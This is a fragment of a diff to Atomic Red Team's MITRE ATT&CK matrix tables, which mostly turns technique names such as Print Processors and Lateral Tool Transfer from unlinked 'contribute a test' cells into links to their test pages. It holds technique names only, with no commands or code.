 |  | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
 |  | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Data from Network Shared Drive](../../T1039/T1039.md) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Process Discovery](../../T1057/T1057.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Encrypted Channel](../../T1573/T1573.md) |  |
+|  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Process Discovery](../../T1057/T1057.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+|  | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Encrypted Channel](../../T1573/T1573.md) |  |
 |  | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Process Injection](../../T1055/T1055.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Software Deployment Tools](../../T1072/T1072.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) |  |
 |  | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Escape to Host](../../T1611/T1611.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Inter-Process Communication](../../T1559/T1559.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -153,7 +153,7 @@
 |  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) |  | DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) |  | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) |  |  |  |  |  |  |  |
-|  |  | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) |  | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) |  | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -16,11 +16,11 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Information Discovery](../../T1082/T1082.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
